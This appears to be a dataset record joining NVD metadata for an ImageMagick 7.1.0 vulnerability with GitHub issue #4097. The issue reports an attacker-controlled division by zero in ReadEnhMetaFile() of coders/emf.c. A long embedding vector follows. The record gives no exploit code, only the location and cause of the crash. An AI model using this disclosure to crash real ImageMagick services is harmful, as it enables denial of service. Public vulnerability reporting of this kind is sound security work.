{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4097" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.1.0-4:*:*:*:*:*:*:*", "matchCriteriaId": "7C1767C6-89C1-4D1E-93E0-AC04EF098E16", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/4097
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0 ### Operating system All system ### Operating system, version and so on All system,the latest version ### Description pBits can be controlled by an attacker,a division-by-zero exception can happen in function ReadEnhMetaFile() of coders/emf.c at line 428,431. ![222](https://user-images.githubusercontent.com/20721416/130314910-b71d616a-6ec9-4d0e-885b-cad8c46fd4d3.png) ### Steps to Reproduce As is mentioned in the description. ### Images _No response_
Division by zero in ReadEnhMetaFile() of coders/emf.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4097/comments
0
2021-08-21T07:53:53
2021-08-21T11:34:44Z
https://github.com/ImageMagick/ImageMagick/issues/4097
976,075,255
4,097
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Division by zero in ReadEnhMetaFile() of coders/emf.c Issue date: --- start body --- ### ImageMagick version 7.1.0 ### Operating system All system ### Operating system, version and so on All system,the latest version ### Description pBits can be controlled by an attacker,a division-by-zero exception can happen in function ReadEnhMetaFile() of coders/emf.c at line 428,431. ![222](https://user-images.githubusercontent.com/20721416/130314910-b71d616a-6ec9-4d0e-885b-cad8c46fd4d3.png) ### Steps to Reproduce As is mentioned in the description. ### Images _No response_ --- end body ---
693
[ -0.009636634029448032, 0.004150290973484516, -0.000564535497687757, 0.007916822098195553, 0.03519219160079956, 0.031070327386260033, -0.008243728429079056, 0.047245092689991, 0.001577679067850113, 0.05511927232146263, -0.000494801381137222, 0.0054081701673567295, -0.004018817562609911, 0.011875232681632042, 0.0011264060158282518, 0.020822521299123764, -0.023096652701497078, 0.00982851441949606, -0.011093500070273876, -0.018320975825190544, -0.006456402596086264, -0.023480411618947983, -0.03442467376589775, 0.028440862894058228, -0.03104190155863762, 0.007049809210002422, -0.028483502566814423, -0.009139168076217175, 0.018903721123933792, -0.023437771946191788, 0.014653937891125679, 0.002883528359234333, -0.004406130872666836, -0.009245767258107662, 0.05872945860028267, -0.010084354318678379, 0.036869365721940994, 0.0567680187523365, -0.0004979105433449149, 0.020978868007659912, -0.02751699648797512, -0.039541468024253845, 0.0033561212476342916, 0.007916822098195553, 0.0013857991434633732, -0.005354870110750198, -0.024702757596969604, -0.01664380356669426, -0.027318010106682777, 0.018050922080874443, 0.03189469873905182, -0.04846743866801262, -0.014156471006572247, -0.025854038074612617, -0.005543196573853493, -0.020595107227563858, 0.030899768695235252, 0.029307875782251358, -0.03061550110578537, -0.0017118173418566585, -0.01628847047686577, 0.04138920083642006, 0.016515882685780525, 0.029108889400959015, -0.0415881872177124, 0.004125417675822973, -0.029563715681433678, 0.011924979276955128, -0.020666174590587616, 0.005706649739295244, -0.02154739946126938, -0.045738477259874344, 0.04534050449728966, 0.01604684442281723, 0.02397787943482399, -0.0028355582617223263, 0.03468051180243492, 0.01116456650197506, -0.005059943534433842, 0.005404616706073284, -0.02829873003065586, 0.033230751752853394, -0.04036584123969078, 0.007533062249422073, 0.03959832340478897, -0.005230503622442484, -0.044374000281095505, -0.07129403948783875, -0.0393424816429615, 0.01323971152305603, -0.00644929613918066, 0.012571685947477818, -0.007859968580305576, -0.014995057135820389, -0.0053299968130886555, -0.04167346656322479, 0.004228463862091303, -0.017226548865437508, -0.04025213420391083, -0.024390066042542458, 0.007341182325035334, -0.011818379163742065, -0.019102707505226135, -0.014156471006572247, 0.009124954231083393, 0.012216352857649326, -0.012791992165148258, -0.02008342742919922, 0.032633792608976364, 0.10659993439912796, -0.019969720393419266, -0.0008941069827415049, -0.03598813712596893, 0.0008523553260602057, 0.015847856178879738, 0.03348659351468086, 0.010098567232489586, -0.012116859667003155, -0.009672167710959911, -0.012131072580814362, -0.010134100914001465, -0.027730196714401245, -0.00841428805142641, 0.01691385544836521, -0.01933012157678604, 0.049121249467134476, 0.005116797052323818, -0.018676308915019035, -0.020097641274333, 0.004153843969106674, 0.012223458848893642, -0.03931405767798424, 0.019287481904029846, -0.01761030964553356, 0.01043258048593998, 0.007554382085800171, -0.051963914185762405, 0.023409346118569374, 0.03823384270071983, 0.024390066042542458, -0.057620819658041, -0.03829069808125496, 0.011861019767820835, -0.003937090747058392, -0.031866274774074554, 0.007874181494116783, -0.012145285494625568, -0.025996170938014984, -0.00726300897076726, -0.0037203377578407526, -0.034282539039850235, -0.014092511497437954, 0.014867137186229229, -0.0018495088443160057, 0.05185020714998245, -0.008641701191663742, 0.030132248997688293, 0.004256890621036291, -0.037636883556842804, -0.05614263191819191, 0.016331110149621964, -0.024262145161628723, -0.003153581405058503, -0.017652949318289757, -0.008236621506512165, 0.0027751517482101917, -0.00035710979136638343, 0.020225560292601585, -0.026365717872977257, 0.031525153666734695, 0.032633792608976364, -0.013218391686677933, 0.012962551787495613, -0.031269315630197525, -0.026450997218489647, 0.039200350642204285, -0.008691447786986828, -0.003425411181524396, -0.01579100452363491, -0.01302651222795248, -0.015179830603301525, 0.004125417675822973, -0.005909189581871033, -0.012642752379179, 0.028170809149742126, -0.026152517646551132, 0.02450377121567726, -0.011441726237535477, 0.017908789217472076, -0.03561859205365181, 0.018320975825190544, 0.00694320909678936, 0.017923003062605858, -0.014483378268778324, 0.0362439788877964, 0.002339868573471904, -0.025555558502674103, -0.0339982733130455, 0.02898096852004528, -0.026337290182709694, -0.008172661997377872, 0.007490422111004591, -0.01621740311384201, -0.021348413079977036, -0.003937090747058392, 0.024105798453092575, -0.025157583877444267, 0.003551554400473833, -0.0006036221166141331, -0.02976270206272602, -0.0013591491151601076, -0.0047046104446053505, -0.01289148535579443, -0.003528457833454013, -0.007461995352059603, 0.007074682507663965, 0.008229514583945274, 0.02925102226436138, -0.007319862022995949, -0.002050272189080715, 0.05025831609964371, -0.006499042734503746, -0.015250897035002708, -0.013296565040946007, -0.04531208053231239, -0.05895686894655228, 0.0022083953954279423, -0.03252008557319641, -0.0334581658244133, -0.01379403192549944, 0.0009745010756887496, -0.009750341065227985, -0.011576753109693527, -0.001534150680527091, 0.007277222350239754, -0.00940211396664381, -0.0037238909862935543, -0.016160549595952034, 0.01863366924226284, 0.03576072305440903, 0.02338091842830181, 0.00891886092722416, -0.019116921350359917, -0.016530096530914307, 0.009196020662784576, -0.002012962009757757, -0.014923990704119205, 0.0011210759403184056, -0.029194168746471405, 0.015336177311837673, -0.0022847920190542936, -0.014838711358606815, 0.007398035377264023, -0.0031766779720783234, 0.008975714445114136, -0.007767581846565008, 0.007781795226037502, 0.021433694288134575, -0.0017713356064632535, -0.025058090686798096, 0.06225436180830002, -0.007447781972587109, -0.028440862894058228, 0.00905388779938221, 0.03513533994555473, -0.01569151133298874, -0.04406130686402321, 0.015592017211019993, -0.007533062249422073, -0.002314995275810361, 0.04792733117938042, -0.053157832473516464, -0.004374150652438402, -0.0477851964533329, -0.0007999436929821968, -0.003233531257137656, 0.004473643843084574, 0.011192993260920048, 0.0002128667401848361, -0.006172136403620243, 0.007867075502872467, 0.029094675555825233, 0.0024784484412521124, 0.01853417605161667, 0.010951366275548935, -0.0265647042542696, 0.010816340334713459, -0.03362872451543808, -0.04249783977866173, -0.010695526376366615, -0.0194011889398098, 0.0025495151057839394, -0.05716599151492119, 0.007760475389659405, -0.0008017203654162586, 0.0002467344456817955, -0.0074335685931146145, -0.0025210885796695948, -0.05085527524352074, -0.02544185146689415, -0.013900631107389927, -0.040934376418590546, 0.004676183685660362, -0.009615314193069935, -0.031240887939929962, 0.007312755566090345, -0.0012969658710062504, -0.0015696840127930045, -0.0016061057103797793, -0.044885680079460144, 0.034708939492702484, -0.03439624607563019, 0.021860092878341675, -0.023764679208397865, -0.020978868007659912, -0.009721914306282997, 0.006054876372218132, -0.014611298218369484, 0.004871617071330547, 0.004853850230574608, 0.005102583672851324, 0.020040787756443024, -0.008691447786986828, 0.020580893382430077, 0.012806205078959465, 0.005223396699875593, -0.02561241015791893, 0.03550488501787186, -0.050684716552495956, 0.004160950891673565, 0.015748362988233566, -0.021931160241365433, 0.009764553979039192, -0.011924979276955128, -0.004516283981502056, -0.03800642862915993, -0.001763340551406145, 0.029307875782251358, 0.024219505488872528, 0.03482264652848244, -0.029023608192801476, 0.0012072442332282662, -0.00020831404253840446, -0.019287481904029846, 0.0023967218585312366, -0.013083365745842457, 0.007945248857140541, -0.012109752744436264, 0.00982851441949606, -0.005667563062161207, 0.0008194869733415544, 0.055858366191387177, -0.015449884347617626, 0.04363490641117096, -0.014518911018967628, -0.023679398000240326, -0.0016949389828369021, -0.021874306723475456, 0.0010659993859007955, -0.008073168806731701, 0.005575176794081926, -0.03783586993813515, -0.008094488643109798, -0.008037635125219822, -0.005287356674671173, -0.004754357039928436, 0.011505686677992344, -0.008371648378670216, 0.013779818080365658, 0.0037914044223725796, -0.014668150804936886, 0.0343109667301178, -0.017269190400838852, 0.013914844952523708, -0.04045112058520317, -0.0019134688191115856, 0.011143246665596962, -0.005273143295198679, -0.037466324865818024, 0.02338091842830181, -0.02802867628633976, 0.0396551750600338, -0.006680262740701437, -0.03735261783003807, 0.05105426162481308, -0.0075899153016507626, -0.01725497655570507, 0.02363675832748413, -0.017382895573973656, -0.01775244250893593, -0.030075395479798317, 0.0427536815404892, -0.027744410559535027, -0.04030898958444595, 0.025740331038832664, 0.05554567277431488, -0.000883891130797565, -0.01276356540620327, 0.03001854196190834, -0.027715982869267464, 0.0036954644601792097, -0.0230397991836071, 0.031269315630197525, 0.0020378355402499437, 0.021632680669426918, 0.005983809474855661, 0.0016203189734369516, -0.0014462057733908296, 0.014781857840716839, -0.011228526942431927, 0.009117848239839077, -0.011463046073913574, -0.005557409953325987, 0.009139168076217175, 0.03408355265855789, 0.04011000320315361, -0.027843903750181198, 0.007216815836727619, -0.019159561023116112, -0.007291435729712248, 0.0024056052789092064, -0.016842789947986603, 0.0001264763850485906, 0.03371400758624077, 0.007234582211822271, 0.008421394973993301, -0.0014879574300721288, -0.0008061620173975825, 0.005059943534433842, 0.0073269689455628395, -0.03192312642931938, -0.022613398730754852, -0.0027929183561354876, 0.010411260649561882, -0.004608670715242624, -0.013246818445622921, -0.01698492281138897, -0.01810777559876442, -0.011612285859882832, -0.0028320050332695246, 0.003011448075994849, 0.05867260321974754, 0.019856015220284462, -0.014469164423644543, -0.03408355265855789, -0.025043878704309464, -0.03294648602604866, -0.024944385513663292, -0.000290262745693326, -0.01716969534754753, -0.015989990904927254, 0.01725497655570507, 0.007120875641703606, -0.023579904809594154, 0.01708441600203514, 0.02959214150905609, -0.02552713081240654, -0.012521939352154732, 0.03786429762840271, -0.000753306201659143, -0.010667100548744202, 0.04340749233961105, -0.006715795956552029, 0.0068863555788993835, 0.046193305402994156, 0.01004171371459961, -0.007540168706327677, 0.023949451744556427, 0.02319614589214325, -0.01388641819357872, -0.004569584038108587, 0.009039674885571003, 0.03732419013977051, 0.0037274444475769997, 0.007074682507663965, 0.003345461329445243, -0.019557535648345947, 0.007696515414863825, 0.0078102219849824905, -0.025399211794137955, 0.03544803336262703, -0.04502781108021736, -0.04076381400227547, -0.009892473928630352, 0.050656288862228394, -0.009458967484533787, 0.03468051180243492, -0.013083365745842457, -0.021078361198306084, 0.034282539039850235, -0.006580769550055265, 0.01732604205608368, -0.012571685947477818, -0.033259179443120956, 0.0030878446996212006, 0.011249846778810024, -0.02355147898197174, -0.002654338488355279, 0.04701767861843109, -0.001376027474179864, 0.020126067101955414, -0.016188977286219597, 0.023579904809594154, 0.008862008340656757, 0.021504759788513184, -0.02380731888115406, -0.016089484095573425, -0.027843903750181198, -0.04443085193634033, -0.029393155127763748, 0.01215949933975935, -0.03192312642931938, 0.015762576833367348, -0.053697939962148666, 0.00038420394412241876, -0.002043165499344468, 0.029535287991166115, -0.004288870841264725, 0.013978804461658001, 0.022457053884863853, -0.001153944293037057, -0.0061010695062577724, 0.02993326261639595, 0.04951922222971916, 0.03991101682186127, 0.013417378067970276, 0.02666419744491577, 0.0029279449954628944, -0.018306761980056763, -0.02295451983809471, 0.022556547075510025, 0.00021952924726065248, 0.005120350047945976, 0.060776177793741226, -0.01691385544836521, 0.010802126489579678, -0.00840718112885952, -0.004047244321554899, -0.01004171371459961, -0.011548326350748539, 0.0032477446366101503, 0.027701769024133682, -0.03320232778787613, -0.0017526806332170963, -0.007639661896973848, 0.010070140473544598, -0.023238785564899445, 0.00870566163212061, -0.013772711157798767, -0.023864172399044037, 0.02173217386007309, -0.02733222395181656, -0.013296565040946007, -0.009267088025808334, -0.002933274954557419, 0.01212396565824747, 0.011391979642212391, -0.028099743649363518, 0.043862320482730865, 0.014518911018967628, 0.03792114928364754, -0.01513719093054533, 0.0052660368382930756, 0.02569769136607647, 0.0064031025394797325, -0.018505748361349106, -0.009409220889210701, 0.01965702883899212, -0.036101844161748886, -0.03416883200407028, 0.037466324865818024, -0.012408232316374779, 0.007060469128191471, -0.006865035742521286, -0.02139105275273323, 0.019529107958078384, 0.025925103574991226, 0.003386324504390359, 0.021931160241365433, 0.011704673059284687, 0.03519219160079956, -0.017354469746351242, 0.019813373684883118, 0.019600175321102142, 0.00601223623380065, -0.028241876512765884, 0.0019223521230742335, -0.018647881224751472, -0.004455877467989922, -0.014767643995583057, -0.010986899957060814, 0.02709059603512287, 0.010070140473544598, 0.0075899153016507626, 0.030501794070005417, 0.0016949389828369021, 0.013460018672049046, 0.01570572331547737, 0.02338091842830181, -0.018150415271520615, -0.013168645091354847, -0.0007080012583173811, -0.020822521299123764, -0.022059079259634018, -0.036272402852773666, 0.01647324301302433, 0.019713880494236946, 0.0012774225324392319, -0.008115808479487896, 0.005337103269994259, 0.012081325985491276, 0.03240637853741646, 0.03337288647890091, 0.0020236221607774496, 0.006452849600464106, -0.0004699280543718487, -0.00111485761590302, 0.005038623698055744, 0.0013404941419139504, 0.005926956422626972, 0.008044742047786713, -0.04150290787220001, 0.010489434003829956, 0.020765667781233788, 0.004804103635251522, -0.014824497513473034, -0.015677297487854958, -0.018235696479678154, 0.0025708351749926805, -0.03010382130742073, -0.013715858571231365, 0.028696702793240547, 0.015805216506123543, -0.04440242797136307, 0.005433043465018272, 0.033515021204948425, 0.03408355265855789, -0.03172414004802704, -0.020467188209295273, -0.005177203565835953, 0.0021817453671246767, 0.010979793034493923, -0.0004979105433449149, 0.005312229972332716, -0.010631566867232323, -0.01289148535579443, 0.010489434003829956, 0.03044494055211544, 0.023523053154349327, 0.04897911846637726, -0.05159436911344528, -0.005802589934319258, -0.0029474881011992693, 0.009515821002423763, -0.006250309757888317, -0.012138179503381252, 0.044629838317632675, 0.06560871005058289, -0.0075472756288945675, 0.0012898591812700033, -0.01522247027605772, -0.017098629847168922, 0.005916296504437923, -0.017823509871959686, 0.0158762838691473, -0.03732419013977051, -0.02984798140823841, -0.011711779981851578, 0.02845507673919201, 0.024432705715298653, -0.004640650469809771, 0.01647324301302433, 0.005742182955145836, 0.009373687207698822, -0.0024642350617796183, 0.0030150015372782946, 0.045141518115997314, 0.026593130081892014, -0.01225188560783863, 0.0339982733130455, 0.024006305262446404, 0.00038220518035814166, 0.00210179528221488, 0.009480287320911884, 0.0014319925103336573, -0.009494501166045666, -0.025370784103870392, 0.0036261745262891054, -0.017894575372338295, -0.04016685485839844, 0.024304784834384918, 0.007760475389659405, -0.0009451860678382218, -0.018932148814201355, 0.0033117046114057302, 0.011086393147706985, 0.0007186612347140908, 0.014639724045991898, -0.020154494792222977, -0.0037132310681045055, -0.029791127890348434, 0.00508837029337883, 0.0015883389860391617, 0.02655049040913582, 0.009174700826406479, 0.026976890861988068, -0.00100736937019974, -0.009416327811777592, 0.00020576007955241948, -0.005440149921923876, -0.0016816139686852694, 0.014767643995583057, -0.02363675832748413, 0.001934788771905005, 0.01414936501532793, -0.03269064798951149, -0.012571685947477818, -0.007909715175628662, -0.009856940247118473, 0.010951366275548935, -0.014725004322826862, 0.006161476019769907, -0.030046967789530754, -0.03766531124711037, 0.02294030599296093, 0.004235570784658194, 0.04207143932580948, -0.00006329370808089152, 0.02933630160987377, 0.01759609580039978, -0.011093500070273876, -0.014177791774272919, 0.003084291471168399, 0.001822858932428062, -0.0019401188474148512, -0.01242244616150856, 0.03095662035048008, 0.007774688769131899, 0.019472254440188408, 0.011761526577174664, 0.008698554709553719, 0.016444817185401917, -0.019173774868249893, -0.03993944078683853, -0.0075117419473826885, -0.008556421846151352, -0.0022599187213927507, 0.030587075278162956, -0.004224910866469145, -0.016530096530914307, 0.006911229342222214, 0.014682364650070667, 0.01250772550702095, -0.027886543422937393, 0.0017535688821226358, 0.005116797052323818, -0.0018015388632193208, 0.000727100414223969, 0.027900757268071175, -0.011328020133078098, 0.014796070754528046, -0.0009949327213689685, -0.011470152996480465, 0.020296627655625343, 0.03422568738460541, 0.02259918674826622, 0.003354344516992569, 0.0025566217955201864, 0.025555558502674103, 0.011200100183486938, -0.007724942173808813, 0.009679273702204227, -0.027616489678621292, 0.000521007168572396, -0.008947287686169147, -0.009210234507918358, -0.0076538752764463425, -0.0245890524238348, 0.01142751332372427, 0.023764679208397865, -0.03348659351468086, 0.0194011889398098, -0.02967742271721363, 0.020993079990148544, 0.0033312479499727488, -0.02294030599296093, 0.004942683503031731, -0.0295068621635437, -0.005685329902917147, 0.022528119385242462, -0.014582871459424496, -0.02768755704164505, 0.05040045082569122, 0.0035693212412297726, -0.012408232316374779, -0.0031269313767552376, -0.014653937891125679, 0.025655051693320274, -0.010198060423135757, -0.022869238629937172, 0.004065010696649551, 0.0064421892166137695, -0.04474354535341263, -0.029222596436738968, -0.033145472407341, -0.014291497878730297, -0.0388023778796196, 0.011541219428181648, -0.03010382130742073, 0.012322952039539814, 0.002272355370223522, -0.003281501354649663, 0.02166110649704933, 0.0057350764982402325, 0.013531085103750229, 0.008847794495522976, -0.014483378268778324, -0.0017544572474434972, 0.008478248491883278, 0.0120244724676013, -0.016146337613463402, -0.008940180763602257, -0.030245954170823097, -0.03829069808125496, -0.029620569199323654, 0.006761989090591669, 0.006289395969361067, -0.003908664453774691, 0.013680324889719486, 0.020310841500759125, -0.01570572331547737, -0.039882589131593704, -0.0010091461008414626, 0.01090161968022585, -0.0058523365296423435, 0.02173217386007309, -0.0027378415688872337, -0.01751081645488739, -0.0441465862095356, 0.017894575372338295, -0.015378816984593868, -0.005699543282389641, -0.023011373355984688, -0.036272402852773666, -0.014462057501077652, -0.019045855849981308, -0.014938204549252987, -0.008272155188024044, -0.000013630356079374906, -0.014334137551486492, 0.033173900097608566, 0.01645902916789055, 0.004068564157932997, 0.022826598957180977, 0.0013085141545161605, -0.017880361527204514, -0.005912743043154478, -0.012180819176137447, 0.0262946505099535, -0.02225806564092636, -0.005944723263382912, 0.011690459214150906, 0.0022776853293180466, -0.012322952039539814, 0.04650599882006645, -0.0011255176505073905, 0.008371648378670216, 0.0078102219849824905, 0.0181219894438982, 0.006900568958371878, -0.017013350501656532, -0.0036812510807067156, 0.04758621007204056, -0.011015326716005802, -0.03422568738460541, -0.0236225463449955, -0.008869114331901073, 0.005763503257185221, 0.007952354848384857, 0.005465023219585419, -0.008599061518907547, 0.008755408227443695, 0.0028160149231553078, 0.023736251518130302, -0.017553456127643585, -0.029364729300141335, 0.002970584901049733, -0.05304412916302681, -0.028440862894058228, -0.015122977085411549, 0.03510691225528717, -0.007127982098609209, -0.007376715540885925, -0.024873318150639534, 0.027303796261548996, 0.011121926829218864, 0.00534421019256115, -0.006200562696903944, -0.03274749964475632, 0.005781269632279873, 0.0022545885294675827, -0.01181127317249775, 0.02166110649704933, -0.0019987488631159067, -0.005052837077528238, -0.009892473928630352, 0.04164504259824753, 0.013346311636269093, 0.02414843812584877, 0.0014772973954677582, 0.012607218697667122, -0.02311086654663086, -0.02716166339814663, -0.020467188209295273, -0.02595353126525879, 0.006410209462046623, -0.015592017211019993, 0.009544247761368752, -0.007774688769131899, 0.024262145161628723, -0.028312942013144493, 0.028654063120484352, -0.012500619515776634, 0.010503646917641163, -0.0011432842584326863, -0.021675320342183113, -0.049291808158159256, 0.04175874963402748, 0.007088895887136459, -0.006918335799127817, -0.0006942320615053177, -0.00048192054964601994, 0.005138116888701916, 0.0028586548287421465, 0.0002345198590774089, -0.026024596765637398, -0.0042213574051856995, 0.007568595465272665, -0.033770859241485596, -0.027119023725390434, 0.0022403753828257322, 0.010574713349342346, 0.022613398730754852, 0.009842727333307266, -0.006104622967541218, -0.007945248857140541, 0.04022371023893356, -0.01452601794153452, -0.010375726968050003, -0.01810777559876442, -0.04511309415102005, -0.016586950048804283, 0.022229639813303947, 0.001339605893008411, -0.008485354483127594, 0.01820726878941059, -0.013843778520822525, 0.003551554400473833, 0.003993944264948368, 0.016700657084584236, -0.015236684121191502, -0.01863366924226284, -0.044374000281095505, -0.01475343108177185, -0.006790415849536657, 0.021533187478780746, -0.023011373355984688, -0.026180943474173546, -0.04002472385764122, -0.011889446526765823, 0.002766268327832222, 0.003510691225528717, -0.01017674058675766, 0.032122112810611725, -0.03760845586657524, 0.027374863624572754, -0.0030505347531288862, -0.003242414677515626, -0.012969658710062504, 0.008613274432718754, -0.00880515482276678, -0.002853324869647622, 0.07089606672525406, 0.016430603340268135, 0.016018416732549667, -0.031866274774074554, 0.046619705855846405, 0.04346434772014618, -0.013388952240347862, 0.015620443969964981, -0.004612223710864782, 0.018320975825190544, -0.009359474293887615, -0.05867260321974754, 0.015378816984593868, -0.003912217449396849, -0.006065536290407181, -0.03163886070251465, -0.01645902916789055, -0.008428501896560192, -0.03053022176027298, 0.02863984927535057, 0.03888765722513199, -0.026607343927025795, -0.03522061929106712, -0.002522865077480674, 0.0050421771593391895, 0.026067238301038742, -0.004910703748464584, -0.0032015512697398663, -0.003210434690117836, 0.02828451618552208, 0.027886543422937393, -0.0018352955812588334, 0.009871154092252254, -0.0015590240946039557, -0.015364604070782661, -0.004359937272965908, 0.02674947679042816, 0.0463922917842865, -0.010482327081263065, 0.009949327446520329, -0.030245954170823097, -0.015421457588672638, -0.005322889890521765, 0.009970647282898426, -0.03459523245692253, -0.00491425720974803, 0.0203676950186491, 0.006300056353211403, 0.004498517140746117, 0.0039051109924912453, 0.011882339604198933, 0.007412248756736517, -0.028142383322119713, -0.014092511497437954, 0.019088495522737503, -0.03405512496829033, -0.019600175321102142, 0.014696577563881874, 0.045653197914361954, -0.007383821997791529, -0.019131135195493698, 0.0035018078051507473, -0.021860092878341675, 0.009082314558327198, 0.007568595465272665, -0.0272611565887928, 0.008392968215048313, -0.024134226143360138, 0.010937153361737728, 0.01203157939016819, 0.015592017211019993, -0.00571020320057869, -0.026266224682331085, 0.0034769345074892044, -0.004384810570627451, -0.04192930832505226, 0.012578791938722134, -0.015734151005744934, -0.026337290182709694, -0.027303796261548996, -0.011789952404797077, -0.02545606531202793, -0.003517797915264964, -0.007746262010186911, -0.009750341065227985, 0.02760227583348751, 0.00854220800101757, -0.0021284453105181456, 0.012322952039539814, 0.0075899153016507626, -0.035476457327604294, -0.005091923754662275, 0.02269867993891239, -0.003114494727924466, 0.041190214455127716, -0.0006382670835591853, 0.0027005316223949194, 0.007305649109184742, 0.007092448882758617, -0.0013857991434633732, 0.006093963049352169, -0.00453049736097455, -0.027616489678621292, 0.008456927724182606, -0.023252999410033226, 0.005870102904736996, 0.001129070995375514, 0.015464097261428833, -0.02578297071158886, -0.003976177424192429, 0.002418041927739978, -0.016316896304488182, -0.016245830804109573, -0.013644792139530182, 0.031866274774074554, 0.066290944814682, -0.008492461405694485, -0.03450995311141014, -0.005184310022741556, -0.009046780876815319, -0.0024446919560432434, -0.022471265867352486, -0.00028204565751366317, -0.0031038348097354174, -0.003652824554592371, 0.014980844222009182, -0.0011859242804348469, -0.008229514583945274, 0.04070696234703064, 0.02060932107269764, 0.001651410711929202, -0.001133512589149177, 0.0020573786459863186, 0.0054863435216248035, -0.024006305262446404, -0.007270115427672863, 0.010851873084902763, 0.0068828025832772255, -0.031070327386260033, 0.015819430351257324, -0.00045082889846526086, -0.010226487182080746, -0.013211285695433617, -0.03956989571452141, -0.015037697739899158, -0.021405266597867012, -0.006580769550055265, 0.0005059055401943624, -0.004370597191154957, -0.007497528567910194, -0.007717835251241922, 0.02603881061077118, 0.019600175321102142, -0.00521629024296999, -0.007525955326855183, 0.0021426586899906397, 0.002052048686891794, 0.0010286893229931593, -0.022457053884863853, -0.002654338488355279, -0.0008119361591525376, 0.037807442247867584, 0.005191416945308447, -0.019259054213762283, 0.019614387303590775, -0.009764553979039192, -0.015819430351257324, 0.03632925823330879, 0.007703621871769428, 0.01255036611109972, 0.0156062301248312, -0.021092573180794716, -0.003528457833454013, -0.02569769136607647, -0.01193919312208891, -0.003922877833247185, 0.0038091710302978754, -0.025285504758358, 0.02586825005710125, -0.0006178354378789663, 0.002878198167309165, -0.0020094087813049555, -0.006459956057369709, -0.031439874321222305, 0.029108889400959015, 0.0265647042542696, -0.0010873193386942148, -0.023821532726287842, -0.012685392051935196, 0.019685454666614532, 0.027374863624572754, 0.019884441047906876, 0.025839824229478836, -0.002940381644293666, -0.01513719093054533, 0.02984798140823841, 0.014995057135820389, -0.01586207002401352, 0.034623660147190094, -0.006722902413457632, 0.005237610079348087, -0.016331110149621964, -0.03061550110578537, -0.0074335685931146145, -0.011718885973095894, 0.0024997685104608536, -0.009999074041843414, 0.007717835251241922, -0.007149302400648594, 0.038262270390987396, 0.0384896844625473, -0.006435082759708166, 0.008556421846151352, -0.014199111610651016, -0.009586887434124947, 0.01423464436084032, -0.005987362936139107, -0.000548545503988862, -0.014938204549252987, -0.030643928796052933, 0.0029936814680695534, 0.015023483894765377, 0.02191694639623165, -0.00513456342741847, -0.009757447056472301, -0.04681869223713875, -0.013005192391574383, 0.014810284599661827, -0.027047956362366676, -0.02146212011575699, 0.023679398000240326, 0.0007177728693932295, -0.0031127179972827435, -0.023935237899422646, -0.02603881061077118, -0.015563590452075005, -0.02484489232301712, 0.0312124602496624, 0.0016114356694743037, 0.03692621737718582, 0.025328144431114197, 0.00870566163212061, -0.003146474715322256, 0.03342973813414574, -0.0030505347531288862, 0.001415114151313901, 0.009359474293887615, -0.0019294588128104806, -0.004345723893493414, 0.024262145161628723, -0.024006305262446404, 0.018065135926008224, -0.0005694213323295116, -0.015194044448435307, -0.005372636951506138, -0.02801446244120598, 0.01965702883899212, 0.02380731888115406, 0.010752379894256592, 0.01193919312208891, -0.0064421892166137695, 0.003883790923282504, 0.020481400191783905, 0.030473368242383003, 0.019216414541006088, 0.026337290182709694, -0.019955508410930634, 0.008257941342890263, 0.027971822768449783, -0.022130146622657776, -0.01974230818450451, 0.0438338927924633, -0.01698492281138897, 0.010887406766414642, 0.009615314193069935, 0.005376189947128296, 0.004143184050917625, 0.009892473928630352, -0.0021142319310456514, 0.007689408492296934, 0.0223433468490839, 0.009423433803021908, -0.021234707906842232, -0.02871091663837433, -0.02338091842830181, 0.02682054415345192, 0.023395132273435593, -0.005095476750284433, 0.034623660147190094, 0.0429810956120491, 0.007362502161413431, -0.0015474756946787238, 0.010738166980445385, -0.0011592742521315813, -0.0027964715845882893, -0.005532536655664444, 0.010553393512964249, -0.004953343421220779, -0.0004956896882504225, -0.01539303082972765, -0.03334445878863335, 0.007597022224217653, 0.00953003391623497, -0.04991719499230385, -0.0028586548287421465, 0.0008541319984942675, 0.023764679208397865, -0.005155883729457855, -0.03820541501045227, -0.01473921723663807, -0.01212396565824747, -0.009409220889210701, -0.00953003391623497, -0.01907428167760372, 0.021717960014939308, -0.005340656731277704, -0.010816340334713459, -0.002450021915137768, 0.022613398730754852, -0.013815351761877537, -0.025399211794137955, 0.013445804826915264, 0.0158762838691473, -0.009615314193069935, -0.013687431812286377, 0.018747374415397644, 0.03999629616737366, -0.0028817516285926104, 0.013296565040946007, -0.014355458319187164, -0.007831541821360588, 0.0054472568444907665, 0.015719937160611153, 0.01142040640115738, -0.012322952039539814, -0.019159561023116112, 0.019685454666614532, 0.007504635490477085, 0.009252874180674553, -0.019557535648345947, 0.023224571719765663, 0.010226487182080746, -0.00773915508762002, -0.009167594835162163, -0.010496539995074272, -0.011498579755425453, -0.015051910653710365, 0.005557409953325987, 0.01254325918853283, -0.021106787025928497, -0.014227538369596004, -0.021263133734464645, 0.011725992895662785, -0.004917810205370188, 0.01699913665652275, 0.02042454667389393, -0.005937616340816021, -0.030473368242383003, 0.007646768819540739, 0.0037629776634275913, -0.00034000937012024224, 0.013673217967152596, -0.023082438856363297, -0.022059079259634018, 0.010496539995074272, 0.007817328907549381, -0.006527469493448734, 0.03234952688217163, -0.005969596561044455, -0.0014737440505996346, 0.039285629987716675, -0.025726117193698883, 0.022627612575888634, 0.012472192756831646, -0.028099743649363518, -0.015378816984593868, -0.01924484223127365, 